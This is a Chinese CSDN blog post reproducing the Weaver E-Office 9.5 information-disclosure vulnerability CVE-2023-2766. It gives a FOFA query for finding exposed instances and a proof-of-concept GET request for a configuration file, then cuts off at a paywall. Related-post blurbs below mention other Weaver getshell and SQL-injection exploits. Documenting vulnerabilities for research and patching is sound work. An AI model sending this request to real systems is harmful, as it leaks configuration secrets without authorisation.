【漏洞复现】泛微E-Office信息泄露漏洞(CVE-2023-2766)

最新推荐文章于 2024-02-10 19:47:58 发布
最新推荐文章于 2024-02-10 19:47:58 发布
阅读量558 收藏
点赞数 9
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 泛微e-Weaver 漏洞复现 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/134510078
版权

漏洞描述

Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。
在这里插入图片描述

影响版本

Weaver E-Office 9.5版本

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa  app="泛微-EOffice"

漏洞复现

POC (GET)

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/5
了解本专栏 订阅专栏 解锁全文 超级会员免费看
丢了少年失了心1
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2023-2766泛微E-Office信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-14 1562
Weaver E-Office 9.5版本存在configfile存在信息泄露。攻击者利用该漏洞可以访问文件或目录。
泛微 E-Office sample权限绕过+文件上传组合漏洞Getshell
0xSec
11-28 1021
泛微e-office 存在权限绕过漏洞(测试页面sample.php),攻击者可以通过此页面获取有效cookie绕过权限校验,利用后台文件上传漏洞上传后门文件获取服务器控制权限。
文件sql注入漏洞 shopex_泛微OA网站SQL注入漏洞的修复与安全建议
weixin_39826080的博客
12-22 427
近日,我们安全监测中心监控到泛微OA系统被爆出存在高危的sql注入漏洞,该移动办公OA系统,在正常使用过程中可以伪造匿名身份来进行SQL注入攻击,获取用户等隐私信息,目前该网站漏洞影响较大,使用此E-cology的用户,以及数据库oracle都会受到该漏洞的攻击,经过安全技术的POC安全测试,发现漏洞的利用非常简单,危害较大,可以获取管理员的账号密码,以及webshell。该OA系统漏洞的产生原因...
复现泛微云桥 e-Bridge SQL注入漏洞_45
fushuang333的博客
02-10 751
复现泛微云桥 e-Bridge SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露
漏洞复现泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
Summer's blog
05-13 1万+
泛微ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
漏洞复现--泛微E-Office信息泄露(CVE-2023-2766)
qq_53003652的博客
11-09 540
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品configfile。目前厂商已发布升级补丁以修复漏洞
WuThreat身份安全云-TVD每日漏洞情报-2023-05-19
wuthreat无胁科技的博客
05-19 1070
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-2766,CNNVD-202305-1694。
泛微E-Office敏感信息泄露和未授权访问漏洞
08-03 1449
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微E-Office信息泄露漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-11 454
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。漏洞编号:CVE-2023-2766没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现--泛微E-Office前台文件读取漏洞
qq_53003652的博客
10-08 324
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。app=“泛微-EOffice
泛微E-Office10远程代码执行漏洞
最新发布
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含...2. 登录未升级的系统,单击窗口右上角【版本信息】查看必须是【10.0_20180119】及以上版本:
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
泛微 E-cology V9 信息泄露漏洞
孤桜懶契
06-18 4752
泛微OA E-Cology信息泄露 API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口
泛微oa连接mysql,泛微OA e-cology 数据库接口信息泄露学习
weixin_33893111的博客
03-27 655
泛微OA e-cology 数据库接口信息泄露漏洞信息攻击者可通过存在漏洞的页面直接获取到数据库配置信息。如果攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器;会将当前连接数据库的用户名密码,url,logintype等信息进行des加密,并最终进行返回,可以直接通过des解密获取泄露信息。本人遇见的情况是可以读取数据库用户名密码poc漏洞存在于/mobile/DBcon...
MinIO集群模式信息泄露漏洞CVE-2023-28432)
程序员若风的博客
12-08 1142
MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。
泛微e-office10本地升级
01-30
泛微e-office10是一款优秀的办公自动化软件,其本地升级操作非常简单。首先,我们需要下载最新的e-office10升级包,通常可以在官方网站或相关论坛获取。接着,我们需要备份好原有的e-office10数据,以防止升级过程中出现意外情况导致数据丢失。然后,我们运行升级包,按照界面提示进行操作,通常只需要点击几次“下一步”即可完成升级过程。等待片刻后,系统会自动完成升级,并提示我们重新启动e-office10软件。最后,我们可以打开软件,确认升级是否成功,通常会显示软件版本号已经更新。需要注意的是,在升级过程中,一定要保持电脑网络连接稳定,防止升级失败。总的来说,泛微e-office10的本地升级非常方便快捷,只需要简单的几个步骤就能完成,而且升级后的新版本通常会带来更好的功能和性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值